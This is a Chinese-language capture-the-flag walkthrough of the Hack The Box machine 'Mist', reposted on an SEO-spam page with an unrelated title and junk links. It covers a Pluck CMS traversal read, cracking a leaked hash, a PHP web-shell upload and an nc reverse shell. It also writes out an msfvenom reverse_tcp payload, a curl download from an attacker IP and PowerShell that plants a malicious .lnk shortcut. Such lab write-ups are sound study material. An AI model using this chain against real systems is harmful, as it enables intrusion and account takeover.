当前位置: 首页 > news >正文

网站现在怎么做排名房地产销售工作内容

网站现在怎么做排名,房地产销售工作内容,个人可以做几个网站吗,北京关键词优化整体思路 端口扫描->Pluck CMS组件文件读取漏洞->文件上传获取shell->创建指向exe的快捷方式来提权-> 信息收集&端口利用 namp -sSVC 10.10.11.17目标只开放了80端口,将mist.htb加入到hosts文件后,访问mist.htb Pluck CMS文件读取 在…

整体思路

端口扫描->Pluck CMS组件文件读取漏洞->文件上传获取shell->创建指向exe的快捷方式来提权->

信息收集&端口利用

namp -sSVC 10.10.11.17

在这里插入图片描述

目标只开放了80端口,将mist.htb加入到hosts文件后,访问mist.htb

Pluck CMS文件读取

在这里插入图片描述

在主界面发现一个admin链接,访问它

在这里插入图片描述

在Exploit-db中搜索相关漏洞,发现存在Pluck CMS 4.7 - Directory Traversal

在这里插入图片描述

能够做到任意文件读取,这里也尝试读取win.ini

在这里插入图片描述

发现被检测出攻击行为,怀疑是…/被探测,尝试绕过也无效

回到POC,根据POC来看,它是针对于album的文件读取,那么有没有地方是上传album的地方呢?经过寻找,发现data目录下还有一个settings文件夹,其中的/modules/albums文件夹下有一个admin_backup.php文件

在这里插入图片描述

在这里插入图片描述

用刚刚的POC对该文件进行读取

在这里插入图片描述

得到一串密文,使用hash-identifier识别出可能的hash值后,用john对其进行解密

在这里插入图片描述

在这里插入图片描述

解得密码为lexypoo97,登录进网站

文件上传获取shell

Pluck插件还存在一个文件上传漏洞,登录后在admin.php?action=installmodule目录下上传zip文件,将php代码打包进zip文件中,上传后即可访问到该php文件,具体步骤如下

访问文件上传界面

在这里插入图片描述

将大马写入php文件,压缩成zip文件

在这里插入图片描述

上传zip

在这里插入图片描述

上传完成后,会在/data/modules下看到上传的文件

在这里插入图片描述

访问she11/she11.php

在这里插入图片描述

本地开启http服务,上传完nc.exe后将shell反弹到kali上

在这里插入图片描述

在这里插入图片描述

创建快捷方式提权(原理暂时未知)

在Common Applications文件夹下创建一个Windows快捷方式(.lnk),并将其指向/xmapp/htdocs/下的payload.exe

创建payload.exe,并上传

kali:msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.8 LPORT=9100 -f exe -o payload.exe
靶机:curl http://10.10.14.8:9999/payload.exe -o payload.exe
$objShell = New-Object -ComObject WScript.Shell
$lnk = $objShell.CreateShortcut("c:\Common Applications\Notepad.lnk")
$lnk.TargetPath = "c:\xampp\htdocs\payload.exe"
$lnk.Save()

等待一段时间后,相当于Brandon用户点击了该快捷方式,执行了payload.exe,拿到该用户权限

在这里插入图片描述
---------------------待更新(暂时没思路了QAQ)---------------------

http://www.mmbaike.com/news/395.html

相关文章:

  • 做网做网站建设优化大师下载旧版本安装
  • web网站开发实例教程如何广告推广
  • 个人婚礼网站模板国外网站设计
  • 2017织梦网站怎么做seo如何加入百度推广
  • 北京网站建设的服务公司网络推广求职招聘交流群
  • wordpress free template百度seo排名在线点击器
  • 集团网站建设要多少钱百度口碑官网
  • 广东建设网站首页杭州百度seo代理
  • 网站 真实性核验单重庆百度小额贷款有限公司
  • 网站建设策划目的及过程seo站长博客
  • 做企业网站都需要注意哪点贴吧aso优化贴吧
  • 如何做网站用户活跃度百度关键词热度查询工具
  • 怎么把网站制作成appbt磁力种子搜索引擎
  • 管理网站模板下载免费个人网页制作成品欣赏
  • 网站建设好销售吗网络推广工作内容
  • 找有意者做阿里巴巴去哪个网站百度热搜的含义
  • 深圳贝尔利网络技术有限公司西安关键词优化平台
  • 一站式建设网站厦门搜索引擎优化
  • 北京网站设计公司兴田德润简介软文网
  • 网站建站平台排行榜关键词优化seo费用
  • 为什么找别人做网站品牌策略有哪些
  • 装修工人找活平台seo免费浏览网站
  • 网站建设套餐介绍近三天发生的重要新闻
  • 做植物提取物的专业网站网络营销网课
  • 官网招聘和招聘网站全自动引流推广软件下载
  • 上海市建筑工程有限公司汕头网站建设方案优化
  • 装修公司做自己网站高清视频线和音频线的接口类型
  • 网站网上商城建设方案没有限制的国外搜索引擎
  • 学做网站都要学什么专业百度网页
  • 网站流量怎么做乡1万酒店seo是什么意思